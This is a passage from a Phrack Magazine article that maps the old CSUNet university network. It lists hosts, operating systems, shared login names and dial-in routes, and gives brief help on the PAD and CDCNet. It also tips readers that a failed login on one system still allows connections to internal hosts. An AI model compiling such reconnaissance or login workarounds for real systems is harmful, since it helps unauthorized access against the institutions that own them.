chi       - Calstate/Chico CDC Cyber 180-830 (NOS 2.7.1) - oddly enough
            this system is running CDCNet with itself as the only host
bak       - Calstate/Bakersfield CDC Cyber Dual 830 CMR-1 (NOS 2.7.1)
            this system is running CDCNet, and if you fail the login, you
            can connect to these systems, if you type fast enough:
            CCS      - Central Cyber 960 System
            CSBINA   - CSUB Instructional Vax 3900
            CSBOAA   - CSUB Office Automation Vax 4300
            CYBER    - Local host
            RBFBATCH - CSUB CDC Cyber Remote Batch Gateway
ccs       - CDC Cyber 960-31 (CCS from Swirl)
coc       - CDC Cyber 960-31 (COC from Swirl)
dh        - Calstate/Dominguez Hills CDC Cyber 960-11 (NOS 2.7.1) -
            this system runs CDCNet with no hosts.. go figure
fre       - Calstate/Fresno - No info available
ful       - Calstate/Fullerton - No info available
hay       - Calstate/Hayward - No info available
la        - Calstate/Los Angeles - No info available
lb        - Calstate/Long Beach - No info available
mv        - No info available
news      - No info available
nor       - Calstate/Northridge - No info available
pom       - California State Polytechnic University, Pomona - No info available
sac       - Calstate/Sacramento CDC Cyber 180-830 (NOS 2.5.2)
sf        - Calstate/San Francisco - No info available
sj        - San Jose State University - No info available
son       - Sonoma State University CDC Cyber 180-830 (NOS 2.7.1) - this
            system runs CDCNet with itself as the only host
sm        - No info available
slo       - California State Polytechnic University, San Luis Obispo - No info
            available
sta       - Calstate/Stanislaus - No info available
ven       - No info available
carl      - No info available

caps      - CSUNet networking machine. From it, you can connecting to most
            PAD hosts plus a few more. The extras are:
            access    - Connect to eis.calstate.edu (login as "access")
            core      - Connect to eis.calstate.edu (login as "core")
            ctp       - Connect to eis.calstate.edu (login as "ctp")
            eis       - Connect to eis.calstate.edu (login as "eis")
            trie      - Connect to eis.calstate.edu (login as "trie")
            csupernet - CSUPERNet appears to be a public-access UNIX.
                        login as "public" for ATI-Net.
                        login as "super" for academic information.
                        login as "atls" for the ATLS system
                        Once you apply for an account here, you can telnet
                        to caticsuf.cati.csufresno.edu to use it.

     This is all well and good, but how to you access CSUNet? It can be reached
via Internet, using the Humbolt PACX (pacx.humboldt.edu). The Humboldt PACX
allows several services, among them are:

     X25 - Connect directly to CSUNet PAD
     960 - CDC Cyber 180/830 (Swirl)
     830 - CDC Cyber 180/830 (COC from Swirl)
     VAX - VAX 8700 (VMS V5.3)
     70  - DEC PDP 11/70 (running RSTS)
     SEQ - Sequent S81 (running Dynix V3.1.4 X.25 UNIX software)
  TELNET - Telnet Server

     That's really all there is to say concerning the network structure (well,
I could go through and list all their X.25 addresses, but I won't). There's a
ton more to be said about using this network, but its little quirks and
surprises can be left to you to figure out. What I can do here is give a few
hints on using CDCNet and the PAD.

Using the PAD
~~~~~~~~~~~~~
     Once you're at the X.25 PAD, you'll get a message like:
CSUnet Humboldt PCI/01, Port: P17
     At the "Pad>" prompt, simply type the hostname to connect to. When in
doubt, type "help <subjectname>", or just "help" for a list of subjects that
help is available on.

Using CDCNet
~~~~~~~~~~~~
     When a CDC Cyber says "You may now execute CDCNet Commands", this is your
cue. You have the following commands available:

activate_auto_recognition
activate_x_personal_computer
change_connection_attribute
change_terminal_attribute
change_working_connection
create_connection
delete_connection
display_command_information
display_command_list
display_connection
display_connection_attribute
display_service
display_terminal_attribute
do
help
request_network_operator

     The ones to concern yourself with are display_service, create_connection,
and help. "help" gives the above command listing (useful), "display_service"
lists the hosts on the current CDCNet, and "create_connection <host>" creates a
connection to "host" on the CDCNet.

*******************************************************************************


 
[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]
© Copyleft 1985-2014, Phrack Magazine.